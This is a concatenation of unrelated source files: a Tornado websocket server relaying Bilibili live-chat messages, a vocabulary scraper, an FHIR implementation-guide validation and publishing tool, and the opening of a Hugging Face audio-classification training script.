body = json.dumps({'cmd': cmd, 'data': data})
models.log.add_danmaku(self.room_id, body)
for client in self.clients:
try:
client.write_message(body)
except tornado.websocket.WebSocketClosedError:
room_manager.del_client(self.room_id, client)
def send_message_if(self, can_send_func: Callable[['ChatHandler'], bool], cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
for client in filter(can_send_func, self.clients):
try:
client.write_message(body)
except tornado.websocket.WebSocketClosedError:
room_manager.del_client(self.room_id, client)
async def _on_receive_danmaku(self, danmaku: blivedm.DanmakuMessage):
asyncio.ensure_future(self.__on_receive_danmaku(danmaku))
async def __on_receive_danmaku(self, danmaku: blivedm.DanmakuMessage):
if danmaku.uid == self.room_owner_uid:
author_type = 3 # 主播
elif danmaku.admin:
author_type = 2 # 房管
elif danmaku.privilege_type != 0: # 1总督,2提督,3舰长
author_type = 1 # 舰队
else:
author_type = 0
need_translate = self._need_translate(danmaku.msg)
if need_translate:
translation = models.translate.get_translation_from_cache(danmaku.msg)
if translation is None:
# 没有缓存,需要后面异步翻译后通知
translation = ''
else:
need_translate = False
else:
translation = ''
id_ = uuid.uuid4().hex
# 为了节省带宽用list而不是dict
self.send_message(Command.ADD_TEXT, make_text_message(
await models.avatar.get_avatar_url(danmaku.uid),
int(danmaku.timestamp / 1000),
danmaku.uname,
author_type,
danmaku.msg,
danmaku.privilege_type,
danmaku.msg_type,
danmaku.user_level,
danmaku.urank < 10000,
danmaku.mobile_verify,
0 if danmaku.room_id != self.room_id else danmaku.medal_level,
id_,
translation
))
if need_translate:
await self._translate_and_response(danmaku.msg, id_)
async def _on_receive_gift(self, gift: blivedm.GiftMessage):
avatar_url = models.avatar.process_avatar_url(gift.face)
models.avatar.update_avatar_cache(gift.uid, avatar_url)
if gift.coin_type != 'gold': # 丢人
return
id_ = uuid.uuid4().hex
self.send_message(Command.ADD_GIFT, {
'id': id_,
'avatarUrl': avatar_url,
'timestamp': gift.timestamp,
'authorName': gift.uname,
'totalCoin': gift.total_coin,
'giftName': gift.gift_name,
'num': gift.num
})
async def _on_buy_guard(self, message: blivedm.GuardBuyMessage):
asyncio.ensure_future(self.__on_buy_guard(message))
async def __on_buy_guard(self, message: blivedm.GuardBuyMessage):
id_ = uuid.uuid4().hex
self.send_message(Command.ADD_MEMBER, {
'id': id_,
'avatarUrl': await models.avatar.get_avatar_url(message.uid),
'timestamp': message.start_time,
'authorName': message.username,
'privilegeType': message.guard_level
})
async def _on_super_chat(self, message: blivedm.SuperChatMessage):
avatar_url = models.avatar.process_avatar_url(message.face)
models.avatar.update_avatar_cache(message.uid, avatar_url)
need_translate = self._need_translate(message.message)
if need_translate:
translation = models.translate.get_translation_from_cache(message.message)
if translation is None:
# 没有缓存,需要后面异步翻译后通知
translation = ''
else:
need_translate = False
else:
translation = ''
id_ = str(message.id)
self.send_message(Command.ADD_SUPER_CHAT, {
'id': id_,
'avatarUrl': avatar_url,
'timestamp': message.start_time,
'authorName': message.uname,
'price': message.price,
'content': message.message,
'translation': translation
})
if need_translate:
asyncio.ensure_future(self._translate_and_response(message.message, id_))
async def _on_super_chat_delete(self, message: blivedm.SuperChatDeleteMessage):
self.send_message(Command.ADD_SUPER_CHAT, {
'ids': list(map(str, message.ids))
})
def _need_translate(self, text):
cfg = config.get_config()
return (
cfg.enable_translate
and (not cfg.allow_translate_rooms or self.room_id in cfg.allow_translate_rooms)
and self.auto_translate_count > 0
and models.translate.need_translate(text)
)
async def _translate_and_response(self, text, msg_id):
translation = await models.translate.translate(text)
if translation is None:
return
self.send_message_if(
lambda client: client.auto_translate,
Command.UPDATE_TRANSLATION, make_translation_message(
msg_id,
translation
)
)
def make_text_message(avatar_url, timestamp, author_name, author_type, content, privilege_type,
is_gift_danmaku, author_level, is_newbie, is_mobile_verified, medal_level,
id_, translation):
return [
# 0: avatarUrl
avatar_url,
# 1: timestamp
timestamp,
# 2: authorName
author_name,
# 3: authorType
author_type,
# 4: content
content,
# 5: privilegeType
privilege_type,
# 6: isGiftDanmaku
1 if is_gift_danmaku else 0,
# 7: authorLevel
author_level,
# 8: isNewbie
1 if is_newbie else 0,
# 9: isMobileVerified
1 if is_mobile_verified else 0,
# 10: medalLevel
medal_level,
# 11: id
id_,
# 12: translation
translation
]
def make_translation_message(msg_id, translation):
return [
# 0: id
msg_id,
# 1: translation
translation
]
class RoomManager:
def __init__(self):
self._rooms: Dict[int, Room] = {}
async def get_room(self, room_id):
if room_id not in self._rooms:
if not await self._add_room(room_id):
return
room = self._rooms.get(room_id, None)
return room
async def add_client(self, room_id, client: 'ChatHandler'):
if room_id not in self._rooms:
if not await self._add_room(room_id):
client.close()
return
room = self._rooms.get(room_id, None)
if room is None:
return
room.clients.append(client)
logger.info('%d clients in room %s', len(room.clients), room_id)
if client.auto_translate:
room.auto_translate_count += 1
await client.on_join_room()
def del_client(self, room_id, client: 'ChatHandler'):
room = self._rooms.get(room_id, None)
if room is None:
return
try:
room.clients.remove(client)
except ValueError:
# _add_room未完成,没有执行到room.clients.append
pass
else:
logger.info('%d clients in room %s', len(room.clients), room_id)
if client.auto_translate:
room.auto_translate_count = max(0, room.auto_translate_count - 1)
if not room.clients:
self._del_room(room_id)
async def _add_room(self, room_id):
if room_id in self._rooms:
return True
logger.info('Creating room %d', room_id)
self._rooms[room_id] = room = Room(room_id)
if await room.init_room():
# start new log file
room.start()
logger.info('%d rooms', len(self._rooms))
return True
else:
self._del_room(room_id)
return False
def _del_room(self, room_id):
room = self._rooms.get(room_id, None)
if room is None:
return
logger.info('Removing room %d', room_id)
for client in room.clients:
client.close()
room.stop_and_close()
self._rooms.pop(room_id, None)
logger.info('%d rooms', len(self._rooms))
# noinspection PyAbstractClass
class ChatHandler(tornado.websocket.WebSocketHandler):
HEARTBEAT_INTERVAL = 10
RECEIVE_TIMEOUT = HEARTBEAT_INTERVAL + 5
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._heartbeat_timer_handle = None
self._receive_timeout_timer_handle = None
self.room_id = None
self.auto_translate = False
def open(self):
logger.info('Websocket connected %s', self.request.remote_ip)
self._heartbeat_timer_handle = asyncio.get_event_loop().call_later(
self.HEARTBEAT_INTERVAL, self._on_send_heartbeat
)
self._refresh_receive_timeout_timer()
def _on_send_heartbeat(self):
self.send_message(Command.HEARTBEAT, {})
self._heartbeat_timer_handle = asyncio.get_event_loop().call_later(
self.HEARTBEAT_INTERVAL, self._on_send_heartbeat
)
def _refresh_receive_timeout_timer(self):
if self._receive_timeout_timer_handle is not None:
self._receive_timeout_timer_handle.cancel()
self._receive_timeout_timer_handle = asyncio.get_event_loop().call_later(
self.RECEIVE_TIMEOUT, self._on_receive_timeout
)
def _on_receive_timeout(self):
logger.warning('Client %s timed out', self.request.remote_ip)
self._receive_timeout_timer_handle = None
self.close()
def on_close(self):
logger.info('Websocket disconnected %s room: %s', self.request.remote_ip, str(self.room_id))
if self.has_joined_room:
room_manager.del_client(self.room_id, self)
if self._heartbeat_timer_handle is not None:
self._heartbeat_timer_handle.cancel()
self._heartbeat_timer_handle = None
if self._receive_timeout_timer_handle is not None:
self._receive_timeout_timer_handle.cancel()
self._receive_timeout_timer_handle = None
def on_message(self, message):
try:
# 超时没有加入房间也断开
if self.has_joined_room:
self._refresh_receive_timeout_timer()
body = json.loads(message)
cmd = body['cmd']
if cmd == Command.HEARTBEAT:
pass
elif cmd == Command.JOIN_ROOM:
if self.has_joined_room:
return
self._refresh_receive_timeout_timer()
self.room_id = int(body['data']['roomId'])
logger.info('Client %s is joining room %d', self.request.remote_ip, self.room_id)
try:
cfg = body['data']['config']
self.auto_translate = cfg['autoTranslate']
except KeyError:
pass
asyncio.ensure_future(room_manager.add_client(self.room_id, self))
else:
logger.warning('Unknown cmd, client: %s, cmd: %d, body: %s', self.request.remote_ip, cmd, body)
except Exception:
logger.exception('on_message error, client: %s, message: %s', self.request.remote_ip, message)
# 跨域测试用
def check_origin(self, origin):
if self.application.settings['debug']:
return True
return super().check_origin(origin)
@property
def has_joined_room(self):
return self.room_id is not None
def send_message(self, cmd, data):
body = json.dumps({'cmd': cmd, 'data': data})
try:
self.write_message(body)
except tornado.websocket.WebSocketClosedError:
self.close()
async def on_join_room(self):
if self.application.settings['debug']:
await self.send_test_message()
# 不允许自动翻译的提示
if self.auto_translate:
cfg = config.get_config()
if cfg.allow_translate_rooms and self.room_id not in cfg.allow_translate_rooms:
self.send_message(Command.ADD_TEXT, make_text_message(
models.avatar.DEFAULT_AVATAR_URL,
int(time.time()),
'blivechat',
2,
'Translation is not allowed in this room. Please download to use translation',
0,
False,
60,
False,
True,
0,
uuid.uuid4().hex,
''
))
# 测试用
async def send_test_message(self):
base_data = {
'avatarUrl': await models.avatar.get_avatar_url(300474),
'timestamp': int(time.time()),
'authorName': 'xfgryujk',
}
text_data = make_text_message(
base_data['avatarUrl'],
base_data['timestamp'],
base_data['authorName'],
0,
'我能吞下玻璃而不伤身体',
0,
False,
20,
False,
True,
0,
uuid.uuid4().hex,
''
)
member_data = {
**base_data,
'id': uuid.uuid4().hex,
'privilegeType': 3
}
gift_data = {
**base_data,
'id': uuid.uuid4().hex,
'totalCoin': 450000,
'giftName': '摩天大楼',
'num': 1
}
sc_data = {
**base_data,
'id': str(random.randint(1, 65535)),
'price': 30,
'content': 'The quick brown fox jumps over the lazy dog',
'translation': ''
}
self.send_message(Command.ADD_TEXT, text_data)
text_data[2] = '主播'
text_data[3] = 3
text_data[4] = "I can eat glass, it doesn't hurt me."
text_data[11] = uuid.uuid4().hex
self.send_message(Command.ADD_TEXT, text_data)
self.send_message(Command.ADD_MEMBER, member_data)
self.send_message(Command.ADD_SUPER_CHAT, sc_data)
sc_data['id'] = str(random.randint(1, 65535))
sc_data['price'] = 100
sc_data['content'] = '敏捷的棕色狐狸跳过了懒狗'
self.send_message(Command.ADD_SUPER_CHAT, sc_data)
# self.send_message(Command.DEL_SUPER_CHAT, {'ids': [sc_data['id']]})
self.send_message(Command.ADD_GIFT, gift_data)
gift_data['id'] = uuid.uuid4().hex
gift_data['totalCoin'] = 1245000
gift_data['giftName'] = '小电视飞船'
self.send_message(Command.ADD_GIFT, gift_data)
# noinspection PyAbstractClass
class RoomInfoHandler(api.base.ApiHandler):
_host_server_list_cache = blivedm.DEFAULT_DANMAKU_SERVER_LIST
async def get(self):
room_id = int(self.get_query_argument('roomId'))
logger.info('Client %s is getting room info %d', self.request.remote_ip, room_id)
room_id, owner_uid = await self._get_room_info(room_id)
host_server_list = await self._get_server_host_list(room_id)
if owner_uid == 0:
# 缓存3分钟
self.set_header('Cache-Control', 'private, max-age=180')
else:
# 缓存1天
self.set_header('Cache-Control', 'private, max-age=86400')
self.write({
'roomId': room_id,
'ownerUid': owner_uid,
'hostServerList': host_server_list
})
@staticmethod
async def _get_room_info(room_id):
try:
async with _http_session.get(blivedm.ROOM_INIT_URL, params={'room_id': room_id}
) as res:
if res.status != 200:
logger.warning('room %d _get_room_info failed: %d %s', room_id,
res.status, res.reason)
return room_id, 0
data = await res.json()
except (aiohttp.ClientConnectionError, asyncio.TimeoutError):
logger.exception('room %d _get_room_info failed', room_id)
return room_id, 0
if data['code'] != 0:
logger.warning('room %d _get_room_info failed: %s', room_id, data['message'])
return room_id, 0
room_info = data['data']['room_info']
return room_info['room_id'], room_info['uid']
@classmethod
async def _get_server_host_list(cls, _room_id):
return cls._host_server_list_cache
# 连接其他host必须要key
# try:
# async with _http_session.get(blivedm.DANMAKU_SERVER_CONF_URL, params={'id': room_id, 'type': 0}
# ) as res:
# if res.status != 200:
# logger.warning('room %d _get_server_host_list failed: %d %s', room_id,
# res.status, res.reason)
# return cls._host_server_list_cache
# data = await res.json()
# except (aiohttp.ClientConnectionError, asyncio.TimeoutError):
# logger.exception('room %d _get_server_host_list failed', room_id)
# return cls._host_server_list_cache
#
# if data['code'] != 0:
# logger.warning('room %d _get_server_host_list failed: %s', room_id, data['message'])
# return cls._host_server_list_cache
#
# host_server_list = data['data']['host_list']
# if not host_server_list:
# logger.warning('room %d _get_server_host_list failed: host_server_list is empty')
# return cls._host_server_list_cache
#
# cls._host_server_list_cache = host_server_list
# return host_server_list
# noinspection PyAbstractClass
class AvatarHandler(api.base.ApiHandler):
async def get(self):
uid = int(self.get_query_argument('uid'))
avatar_url = await models.avatar.get_avatar_url_or_none(uid)
if avatar_url is None:
avatar_url = models.avatar.DEFAULT_AVATAR_URL
# 缓存3分钟
self.set_header('Cache-Control', 'private, max-age=180')
else:
# 缓存1天
self.set_header('Cache-Control', 'private, max-age=86400')
self.write({
'avatarUrl': avatar_url
})
# noinspection PyAbstractClass
# handle reply message
class ReplyHandler(api.base.ApiHandler):
def get(self):
self.write('pong')
async def post(self):
uid = None if self.json_args['uid'] == -1 else self.json_args['uid']
avatar_url = await models.avatar.get_avatar_url(uid)
text_message = make_text_message(
avatar_url=avatar_url,
timestamp=int(time.time()),
author_name=self.json_args['name'],
author_type=3,
content=self.json_args['content'],
author_level=0,
id_=uuid.uuid4().hex,
privilege_type=0,
is_newbie=0,
is_gift_danmaku=0,
is_mobile_verified=True,
medal_level=0,
translation=0
)
# get room
room: Room = await room_manager.get_room(room_id=self.json_args['room_id'])
room.send_message(Command.ADD_TEXT, text_message)
```
|
{
"source": "Jecosine/VocabularyX-Dev",
"score": 2
}
|
#### File: VocabularyX-Dev/ScrappingTool/main.py
```python
import os
import sqlite3
from models import *
import json
from bs4 import BeautifulSoup as bs
import requests
url = 'https://www.quword.com/w/{}'
api = 'https://fanyi.youdao.com/openapi.do?type=data&doctype=jsonp&version=1.1&keyfrom=neteaseopen&key=1532272597&callback=?&q='
header = {
'Host': 'www.quword.com',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'sec-ch-ua': '"Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"',
'sec-ch-ua-mobile': '?0',
'DNT': '1',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-User': '?1',
'Sec-Fetch-Dest': 'document',
'Referer': 'https://www.quword.com/tags/GRE',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
'Cookie': 'UM_distinctid=176e8e0fd15154-014f77fed1989e-c791039-144000-176e8e0fd16563; Hm_lvt_b98d5a4c985b16117a3eb5bd26322264=1610224828,1612656986; CNZZDATA1278225540=1105745206-1610223608-https%253A%252F%252Fwww.baidu.com%252F%7C1612664111; m_lpvt_b98d5a4c985b16117a3eb5bd26322264=1612667939'
}
"""return @param word: class Word"""
def query_word(text):
res = requests.get(url.format(text), headers = header)
bsobj = bs(res.text, 'html.parser')
word = Word(text)
word.parse(bsobj)
```
#### File: ScrappingTool/models/source.py
```python
import json
class Source:
def __init__(self):
self.stype = ''
self.title = ''
self.description = ''
"""
Convert html parser(dl) to object
"""
def parser(self, html_parser):
self.title = html_parser.find()
```
|
{
"source": "jecos/ncpi-fhir-utility",
"score": 2
}
|
#### File: ncpi-fhir-utility/ncpi_fhir_utility/app.py
```python
from collections import defaultdict
from copy import deepcopy
from pprint import pformat
import os
import logging
import subprocess
from shutil import rmtree
from configparser import ConfigParser
from requests.auth import HTTPBasicAuth
from ncpi_fhir_utility.oauth import OAuth
from ncpi_fhir_utility.utils import read_json, write_json, camel_to_snake
from ncpi_fhir_utility import loader
from ncpi_fhir_utility.client import FhirApiClient
from ncpi_fhir_utility.config import (
RUN_IG_PUBLISHER_SCRIPT,
CONFORMANCE_RESOURCES,
RESOURCE_SUBMISSION_ORDER,
)
RESOURCE_ID_DELIM = "-"
FILENAME_DELIM = RESOURCE_ID_DELIM
logger = logging.getLogger(__name__)
def validate(
ig_control_filepath,
clear_output=False,
publisher_opts="",
refresh_publisher=True,
):
"""
Validate the FHIR data model (FHIR conformance and example resources)
Run the HL7 FHIR implementation guide (IG) publisher in a Docker container
to validate conformance resources and any example resources against the
conformance resources.
See https://confluence.hl7.org/display/FHIR/IG+Publisher+Documentation
Validation fails if any of the following are true:
- The publisher returns a non-zero exit code
- QA report contains errors with the FHIR resources.
- Any one of the resource files fail model validation in
_custom_validate
IG build errors are ignored since this method only validates the data
model
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param clear_output: Whether to clear all generated output before
validating
:type clear_output: boolean
:param publisher_opts: IG publisher command line options forwarded directly
to the publisher CLI
:type publisher_opts: str
:param refresh_publisher: A flag specifying whether to pull down the IG
publisher Docker image from the remote Docker repository before running
the IG publisher
:type refresh_publisher: boolean
"""
logger.info("Begin validation of FHIR data model")
ig_control_filepath = os.path.abspath(
os.path.expanduser(ig_control_filepath)
)
# Clear previously generated output
if clear_output:
clear_ig_output(ig_control_filepath)
# Read in ig resource file
ig_resource_dict = _load_ig_resource_dict(ig_control_filepath)
# Collect resource filepaths
resource_dicts = []
site_root = os.path.dirname(ig_control_filepath)
ig = ig_resource_dict["content"]
for param in ig.get("definition", {}).get("parameter", []):
if param.get("code") != "path-resource":
continue
resource_dicts.extend(
loader.load_resources(os.path.join(site_root, param.get("value")))
)
# Validate and add resource to IG configuration
_custom_validate(resource_dicts)
# Add entry to IG configuration
_update_ig_config(resource_dicts, ig_resource_dict, add=True)
# Do the standard HL7 FHIR validation via the IG Publisher
_fhir_validate(ig_control_filepath, publisher_opts, refresh_publisher)
logger.info("End validation of FHIR data model")
def clear_ig_output(ig_control_filepath):
"""
Delete all of the output dirs generated by the IG publisher
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
"""
site_root = os.path.dirname(ig_control_filepath)
for dir in ["output", "temp", "template", "input-cache"]:
p = os.path.join(site_root, dir)
if os.path.exists(p):
logger.info(f"Clearing all previously generated output at: {p}")
rmtree(p)
def update_ig_config(data_path, ig_control_filepath, add=True, rm_file=False):
"""
Add/remove the configuration entries to/from IG resource file for all
resources in data_path.
Optional - delete the resource file(s). Only applies if add=False.
When a new resource file is added to the IG it will not be picked up for
validation or site generation by the IG publisher unless the expected
configuration for that resource is present.
:param data_path: Path to directory or file containing resource(s) to
remove from the IG configuration
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param add: Whether to add the configuration versus remove it
:type add: bool
:param rm_file: Whether to delete the resource file(s). Only applies if
add=False
:type rm_file: bool
"""
# Load resource dicts
resource_dicts = loader.load_resources(data_path)
# Load IG resource dict
ig_resource_dict = deepcopy(_load_ig_resource_dict(ig_control_filepath))
# Validate and add resource to IG configuration
_custom_validate(resource_dicts)
# Update the IG configuration
_update_ig_config(resource_dicts, ig_resource_dict)
def publish_to_server(
resource_file_or_dir,
base_url,
username=None,
password=<PASSWORD>,
oauth_url=None,
oauth_client_id=None,
oauth_client_secret=None,
oauth_uma_audience=None,
fhir_version=None,
submission_order=RESOURCE_SUBMISSION_ORDER,
):
"""
Push FHIR resources to a FHIR server
Delete the resources if they exist on the server
PUT any resources that have an `id` attribute defined
POST any resources that do not have an `id` attribute defined
:param resource_file_or_dir: path to a directory containing FHIR resource
files or path to a single resource file
:type resource_file_or_dir: str
:param username: Server account username
:param oauth_url: OAuth provider url used to get an access token
:type oauth_url: str
:param oauth_client_id: OAuth client id
:type oauth_client_id: str
:param oauth_client_secret: OAuth client secret
:type oauth_client_secret: str
:param oauth_uma_audience: OAuth audience to use to get an UMA ticket. If not present, a singular access token
is used.
:type oauth_uma_audience: str
:type username: str
:param password: Server account password
:type password: str
:param fhir_version: FHIR version number
:type fhir_version: str
"""
logger.info(
f"Begin publishing resources in {resource_file_or_dir} to {base_url}"
)
if username and password:
auth = HTTPBasicAuth(username, password)
elif oauth_url and oauth_client_id and oauth_client_secret:
auth = OAuth(oauth_url, oauth_client_id, oauth_client_secret, oauth_uma_audience)
else:
auth = None
client = FhirApiClient(
base_url=base_url, auth=auth, fhir_version=fhir_version
)
resources = loader.load_resources(resource_file_or_dir)
# Re-order resources according to submission order
resources_by_type = defaultdict(list)
for r_dict in resources:
resources_by_type[r_dict["resource_type"]].append(r_dict)
resources = []
for r_type in submission_order:
resources.extend(resources_by_type.pop(r_type, []))
for r_type, remaining in resources_by_type.items():
resources.extend(remaining)
# Delete existing resources
for r_dict in resources:
r = r_dict["content"]
if "url" in r:
success = client.delete_all(
f'{base_url}/{r["resourceType"]}', params={"url": r["url"]}
)
elif "id" in r:
success, results = client.send_request(
"delete", f'{base_url}/{r["resourceType"]}/{r["id"]}'
)
else:
logger.warning(
f'⚠️ Could not delete {r_dict["filename"]}. No way to '
"identify the resource. Tried looking for `url` and `id` in "
"payload."
)
# POST if no id is provided, PUT if id is provideds
for r_dict in resources:
r = r_dict["content"]
id_ = r.get("id")
if id_:
success, results = client.send_request(
"put", f'{base_url}/{r["resourceType"]}/{id_}', json=r
)
else:
success, results = client.send_request(
"post", f'{base_url}/{r["resourceType"]}', json=r
)
if not success:
errors = [
r
for r in results["response"]["issue"]
if r["severity"] == "error"
]
raise Exception(f"Publish failed! Caused by:\n{pformat(errors)}")
def _fhir_validate(ig_control_filepath, publisher_opts, refresh_publisher):
"""
Run the HL7 IG Publisher to do standard FHIR validation on resource files
Called in validate
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:param publisher_opts: IG publisher command line options forwarded directly
to the publisher CLI
:type publisher_opts: str
:param refresh_publisher: A flag specifying whether to pull down the IG
publisher Docker image from the remote Docker repository before running
the IG publisher
:type refresh_publisher: boolean
"""
# Run IG publisher to do FHIR validation
args = [
RUN_IG_PUBLISHER_SCRIPT,
ig_control_filepath,
str(int(refresh_publisher)),
]
if publisher_opts:
args.append(publisher_opts)
subprocess.run(args, shell=False, check=True)
# Check QA report for validation errors
site_root = os.path.dirname(ig_control_filepath)
qa_path = os.path.join(site_root, "output", "qa")
qa_report = os.path.abspath(qa_path + ".html")
logger.info(f"Checking QA report {qa_report} for validation errors")
qa_json = read_json(qa_path + ".json")
if qa_json.get("errs"):
# Extract error messages from qa.txt
errors = []
with open(os.path.abspath(qa_path + ".txt")) as qa_txt:
for line in qa_txt.readlines():
ln = line.strip()
if ln.lower().startswith("error") and (".html" not in ln):
errors.append(ln)
errors = "\n".join(errors)
raise Exception(
f"Errors found in QA report. See {qa_report} for details:"
f"\n\n{errors}\n"
)
def _custom_validate(resource_dicts):
"""
Do custom validation of a resource file in the FHIR model
Called in validate
Validation Rules:
1. JSON paylod must have an `id` attribute populated with a value which
adheres to kebab-case
2. StructureDefinition must have `url` defined
3. StructureDefinition.id = StructureDefinition.url.split('/')[-1]
4. File name must follow format <resource type>-<resource id>
"""
for rd in resource_dicts:
res = rd["content"]
# Check if id is present
rid = res.get("id")
if not rid:
raise KeyError(
"All resources must have an `id` attribute. Resource file: "
f'{rd["filepath"]} is missing `id` or `id` is null.'
)
# If StructureDefinition check that URL is valid
if res["resourceType"] == "StructureDefinition":
if not res.get("url"):
raise KeyError(
"All StructureDefinition resources must have a `url`. "
f'Resource file: {rd["filepath"]} is missing `url` or '
"`url` is null."
)
url_parts = res.get("url").split("/")
if res["id"] != url_parts[-1]:
raise ValueError(
"Invalid value for `url` in StructureDefinition: "
f'{rd["filepath"]}. Value should be: '
f'{"/".join(url_parts + [res["id"]])}'
)
# Try to check if id follows kebab-case (won't be perfect)
expected_id = camel_to_snake(rid).replace("_", "-")
if rid != expected_id:
raise ValueError(
"Resource id must adhere to kebab-case (lowercase with "
f'hyphens between tokens). The `id` "{rid}" in '
f'{rd["filepath"]} should be: {expected_id}'
)
# Check filename
filename, ext = os.path.splitext(os.path.split(rd["filepath"])[-1])
rtype = rd.get("resource_type")
expected_filename = f"{rtype}-{rid}"
if filename != expected_filename:
raise ValueError(
"Resource file names must follow pattern: "
f"<resource type>-<resource id>.json. File {filename}{ext} "
f"should be: {expected_filename}{ext}"
)
logger.info(f"☑️ Initial validation passed for resource {filename + ext}")
def _update_ig_config(
resource_dicts, ig_resource_dict, add=True, rm_file=False
):
"""
Helper for update_ig_config
"""
# Collect resource ids from the input set of resources
resource_set = {
f'{r["content"]["resourceType"]}/{r["content"]["id"]}'
for r in resource_dicts
}
# Reformat IG resource list into a dict so its easier to update
ig_resource = ig_resource_dict["content"]
resources_dict = {}
for r in ig_resource["definition"]["resource"]:
# Only include resources from IG config that have corresponding filess
# Old IG entries will be discarded
key = r["reference"]["reference"]
if key in resource_set:
resources_dict[key] = r
else:
logger.info(f"🔥 Removing old entry {key} from IG")
for rd in resource_dicts:
if rd["resource_type"] == "ImplementationGuide":
continue
# Create the config entry
entry = _create_resource_config(rd, ig_resource.get("publisher"))
# Add/remove configuration entries
if add:
resources_dict[entry["reference"]["reference"]] = entry
else:
del rd[entry["reference"]["reference"]]
if rm_file:
os.rmfile(rd["filepath"])
logger.info(f'🗑 Deleted resource file {rd["filepath"]}')
logger.info(f'☑️ Added IG configuration for {rd["filename"]}')
# Format resource dict back to original list
ig_resource["definition"]["resource"] = [
resources_dict[k] for k in resources_dict
]
write_json(
ig_resource_dict["content"], ig_resource_dict["filepath"], indent=2
)
def _create_resource_config(resource_dict, publisher=""):
"""
Create the expected IG configuration entry for a resource
:param resource_dict: The resource payload from which a config entry will
be created. See ncpi_fhir_utility.loader.load_resources.
:type resource_dict: dict
:param publisher: The value of ImplementationGuide.publisher
:type publisher: str
:returns: IG config entry for the resource
"""
rid = resource_dict["content"].get("id")
rtype = resource_dict["content"].get("resourceType")
suffix = ""
if rtype in CONFORMANCE_RESOURCES:
is_example = False
base = resource_dict["content"].get("baseDefinition")
if base:
base = base.split("/")[-1]
suffix = f", Base: {base}"
else:
is_example = True
profiles = ",".join(
[
p.split("/")[-1]
for p in resource_dict["content"]
.get("meta", {})
.get("profile", [])
]
)
if profiles:
suffix = f", Profiles: {profiles}"
if publisher:
publisher = publisher + " "
return {
"reference": {"reference": f"{rtype}/{rid}"},
"name": f"{publisher}{rtype}/{rid}",
"description": f"{publisher}{rtype} {rid}{suffix}",
"exampleBoolean": is_example,
}
def _load_ig_resource_dict(ig_control_filepath):
"""
Load IG resource JSON into a dict
Find the location of the IG resource file from the ig control file first
:param ig_control_filepath: Path to the implementation guide control file
:type ig_control_filepath: str
:returns: IG resource dict
"""
# Read in ig control file
ig_control_filepath = os.path.abspath(
os.path.expanduser(ig_control_filepath)
)
ig_config = ConfigParser()
ig_config.read(ig_control_filepath)
# Read in ig resource file
ig_filepath = os.path.join(
os.path.split(ig_control_filepath)[0], dict(ig_config["IG"]).get("ig")
)
return loader.load_resources(ig_filepath)[0]
```
|
{
"source": "jecoz/transformers",
"score": 2
}
|
#### File: pytorch/audio-classification/run_audio_classification.py
```python
import logging
import os
import sys
from dataclasses import dataclass, field
from random import randint
from typing import Optional
import datasets
import numpy as np
from datasets import DatasetDict, load_dataset
import transformers
from transformers import (
AutoConfig,
AutoFeatureExtractor,
AutoModelForAudioClassification,
HfArgumentParser,
Trainer,
TrainingArguments,
set_seed,
)
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import check_min_version
from transformers.utils.versions import require_version
logger = logging.getLogger(__name__)
# Will error if the minimal version of Transformers is not installed. Remove at your own risks.
check_min_version("4.14.0.dev0")
require_version("datasets>=1.14.0", "To fix: pip install -r examples/pytorch/audio-classification/requirements.txt")
def random_subsample(wav: np.ndarray, max_length: float, sample_rate: int = 16000):
"""Randomly sample chunks of `max_length` seconds from the input audio"""
sample_length = int(round(sample_rate * max_length))
if len(wav) <= sample_length:
return wav
random_offset = randint(0, len(wav) - sample_length - 1)
return wav[random_offset : random_offset + sample_length]
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
Using `HfArgumentParser` we can turn this class
into argparse arguments to be able to specify them on
the command line.
"""
dataset_name: Optional[str] = field(default=None, metadata={"help": "Name of a dataset from the datasets package"})
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(
default=None, metadata={"help": "A file containing the training audio paths and labels."}
)
eval_file: Optional[str] = field(
default=None, metadata={"help": "A file containing the validation audio paths and labels."}
)
train_split_name: Optional[str] = field(
default="train",
metadata={
"help": "The name of the training data set split to use (via the datasets library). Defaults to 'train'"
},
)
eval_split_name: Optional[str] = field(
default="validation",
metadata={
"help": "The name of the training data set split to use (via the datasets library). Defaults to "
"'validation'"
},
)
audio_column_name: Optional[str] = field(
default="audio",
metadata={"help": "The name of the dataset column containing the audio data. Defaults to 'audio'"},
)
label_column_name: Optional[str] = field(
default="label", metadata={"help": "The name of the dataset column containing the labels. Defaults to 'label'"}
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": "For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
},
)
max_length_seconds: Optional[float] = field(
default=20,
metadata={"help": "Audio clips will be randomly cut to this length during training if the value is set."},
)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
default="facebook/wav2vec2-base",
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from the Hub"}
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
